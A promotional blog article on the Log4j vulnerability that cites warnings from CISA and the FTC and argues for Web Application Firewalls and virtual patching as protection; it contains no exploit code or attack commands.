When the head of the U.S. Cybersecurity and Infrastructure Security Agency (CISA) calls a software vulnerability among the most serious that they have seen in their career, “if not the most serious,” you know that it’s pretty bad. These were the words of security expert Jen Easterly, describing the expanding Log4J crisis, a vulnerability she says could take years to fully address.
Related post: 5 Ways to improve your web application security
The vulnerability in question affects a popular open-source, widely used library for internet services and software applications. The Log4j vulnerability, which requires little in the way of expertise on the part of those who exploit it, could be used to exfiltrate data, infect networks with malware, steal passwords and login information, and much more – conceivably from millions of computers.
Its potentially wide-ranging use cases are a reminder of just why security measures such as Web Application Firewalls (WAF) are so essential.
The significance of the Log4j vulnerability
The Log4j vulnerability is representative of a trend in modern software creation whereby software is often written by patching together building blocks of code, instead of writing it from the ground-up. This is frequently done for time efficiency and cost-savings, as well as to optimize performance by using the best bits of code available. Log4j is one such building block.
It’s a logging tool that assists developers by helping them to track the activity that takes place in systems or applications. In doing so, it can aid them in hunting down and fixing problems. Virtually every piece of software involves some kind of logging functionality – whether that’s for future development, security purposes, or day-to-day operations – and Log4j is a common library for doing this logging. As Jen Easterly pointed out, a major vulnerability is therefore incredibly bad news. (And, given that Log4j helps developers look out for trouble, more than a little ironic in the worst possible way.)
When it comes to individual users and organizations alike, Log4j is pretty much guaranteed to be a part of the tools you rely on on a daily basis. The best possible advice for safeguarding against this vulnerability is to ensure that you keep apps regularly updated, since this allows developers to add the code necessary to protect against this vulnerability.
The FTC steps in
In most cases, diligent developers are quick to patch vulnerabilities when they’re made aware of them. In the case of Log4j, however, there’s an added incentive: They could face legal action from the Federal Trade Commission (FTC) if they don’t adequately protect consumers.
In January, the FTC said that the Log4j vulnerability represented a “severe threat” to web applications, enterprise software solutions, and consumer products – and is being taken advantage of by an increasing number of bad actors. The FTC stated that, to avoid penalties, organizations must “act now” to protect their customers.
This legal warning will most likely prompt developers to more rapidly introduce measures protecting against the Log4j vulnerability. However, thAt alone will not solve the problem. In order to be adequately protected, users have to download and install the necessary patches. This can be time-consuming work that’s difficult in situations in which organizations rely on large numbers of pieces of software, and taking systems offline to install updates may be tricky.
Use the right tools to protect yourself
What users need is a better means by which to manage their protection against software vulnerabilities – from the major ones like Log4j to the more minor, less publicized ones. Luckily, the right cyber security tools are there to help. Web Application Firewalls and other associated solutions (such as WAAP, a.k.a. Web Application & API Protection) can be used to monitor, filter and block HTTP traffic both arriving and leaving web services.
They can also help with virtual patching, referring to a series of rules that block malicious activities without a patch having to be installed. In doing so, these solutions can help protect active and legacy applications, third party tools, APIs and microservices, cloud applications, and much more. Furthermore, they are able to do so in a way that avoids the false positives that can potentially plague such protective solutions.
As the world relies more than ever on web applications and online services in general, such tools are only going to become more critical. An instance like the Log4j vulnerability may not be a widespread occurrence in terms of its seriousness, but there are no shortage of vulnerabilities which nonetheless threaten to negatively impact users around the world.
Organizations and users alike should carry out best practices when it comes to keeping software updated. However, they should also utilize tools like WAF as a much-needed extra level of protection. Given the risk of being targeted by a successful cyber attack, investing in these tools is, by comparison, a no-brainer. It should be part of every sustainable vulnerability management strategy out there.